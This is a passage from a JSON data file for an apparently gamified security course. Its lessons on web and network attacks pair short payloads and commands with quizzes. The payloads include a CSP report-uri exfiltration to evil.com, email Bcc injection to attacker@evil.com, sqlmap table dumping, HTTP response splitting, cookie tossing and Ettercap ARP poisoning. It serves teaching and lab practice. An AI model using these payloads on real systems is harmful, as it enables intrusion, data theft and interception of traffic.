prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2}]},{"id":"w2-csp-report","cat":"Web Application","title":"CSP Report-URI Exploitation","diff":4,"xp":250,"intro":"Abuse CSP reporting to exfiltrate data.","sections":[{"type":"text","content":"If CSP has report-uri and you control it, violations send data to you."},{"type":"code","lang":"bash","content":"# If you can inject: <meta http-equiv='Content-Security-Policy' content='report-uri https://evil.com/collect'>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSP report-uri sends...","opts":["Nothing","Violation details to the configured URL","Passwords","Cookies"],"ans":1},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1}]},{"id":"w2-service-worker","cat":"Web Application","title":"Service Worker Attacks","diff":4,"xp":250,"intro":"Register a malicious service worker for persistent XSS.","sections":[{"type":"text","content":"A service worker intercepts ALL requests from the scope \u2014 persistent MitM."},{"type":"code","lang":"javascript","content":"// Register malicious SW via XSS:\nnavigator.serviceWorker.register('/sw.js')\n// sw.js intercepts all fetch events\n// Persists even after XSS is patched"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Service workers persist because...","opts":["They're encrypted","They remain registered even after the XSS vulnerability is fixed","They're temporary","They need approval each time"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0}]},{"id":"w2-cookie-tossing","cat":"Web Application","title":"Cookie Tossing Attack","diff":3,"xp":200,"intro":"Set cookies from a subdomain to affect the parent domain.","sections":[{"type":"text","content":"A cookie set on sub.target.com with domain=.target.com affects all subdomains."},{"type":"code","lang":"bash","content":"# From XSS on any subdomain:\ndocument.cookie='session=evil; domain=.target.com; path=/'\n# Now the main site uses the attacker's session cookie"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cookie tossing from a subdomain...","opts":["Only affects that subdomain","Can set cookies for the parent domain affecting all subdomains","Is blocked by browsers","Requires HTTPS"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1}]},{"id":"w2-request-split","cat":"Web Application","title":"HTTP Response Splitting","diff":3,"xp":200,"intro":"Inject complete HTTP responses via header injection.","sections":[{"type":"text","content":"CRLF injection can inject an entire response including body."},{"type":"code","lang":"bash","content":"?param=x%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert(1)</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Response splitting injects...","opts":["Headers only","A complete new HTTP response","Cookies only","Redirects only"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1}]},{"id":"w2-blind-sqli-tools","cat":"Web Application","title":"Automated Blind SQLi with sqlmap","diff":1,"xp":100,"intro":"sqlmap automates blind SQL injection extraction.","sections":[{"type":"text","content":"sqlmap handles: boolean, time-based, UNION, error-based, and stacked queries automatically."},{"type":"code","lang":"bash","content":"sqlmap -u 'http://target.com/?id=1' --dbs\nsqlmap -u 'http://target.com/?id=1' -D dbname --tables\nsqlmap -u 'http://target.com/?id=1' -D dbname -T users --dump"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"sqlmap automates...","opts":["Port scanning","SQL injection detection and exploitation","XSS testing","Brute force"],"ans":1},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2}]},{"id":"w2-email-header","cat":"Web Application","title":"Email Header Injection","diff":2,"xp":150,"intro":"Inject headers into email-sending forms.","sections":[{"type":"text","content":"If the app doesn't sanitize email headers, inject CC/BCC to send to arbitrary recipients."},{"type":"code","lang":"bash","content":"# Inject in 'from' or 'subject' field:\nsubject: test%0aBcc: attacker@evil.com\n# Or:\nfrom: victim@target.com%0aCc: attacker@evil.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Email header injection uses...","opts":["SQL","Newline characters to add CC/BCC headers","XSS","CSRF tokens"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1}]},{"id":"w2-unicode-norm","cat":"Web Application","title":"Unicode Normalization Attacks","diff":4,"xp":250,"intro":"Different Unicode representations bypass security filters.","sections":[{"type":"text","content":"Homoglyphs (a vs a), normalization (fi vs fi), and encoding differences bypass WAFs and auth."},{"type":"code","lang":"bash","content":"# Homoglyph: admin vs adm\\u0131n (Turkish i)\n# Normalization: different Unicode forms of same char\n# Case mapping: German eszett -> SS\n# Bypass: WAF checks ASCII, app processes Unicode"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Unicode attacks bypass filters by...","opts":["Encryption","Using visually similar but technically different characters","Speed","Compression"],"ans":1},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1}]},{"id":"w2-graphql-dos","cat":"Web Application","title":"GraphQL Denial of Service","diff":3,"xp":200,"intro":"Deeply nested queries exhaust server resources.","sections":[{"type":"text","content":"Recursive relationships create exponential query complexity."},{"type":"code","lang":"bash","content":"{users{posts{comments{author{posts{comments{author}}}}}}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL DoS uses...","opts":["Large payloads","Deeply nested recursive queries","Many parallel requests","Slow connections"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"na2-ettercap","cat":"Network Attacks","title":"Ettercap ARP Poisoning","diff":1,"xp":100,"intro":"GUI-based ARP poisoning and traffic sniffing.","sections":[{"type":"text","content":"Ettercap combines ARP spoofing, DNS spoofing, and packet filtering in one tool."},{"type":"code","lang":"bash","content":"ettercap -T -q -i eth0 -M arp:remote /gateway// /target//"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Ettercap combines...","opts":["Only port scanning","ARP spoofing, DNS spoofing, and packet filtering","Only sniffing","Only scanning"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at 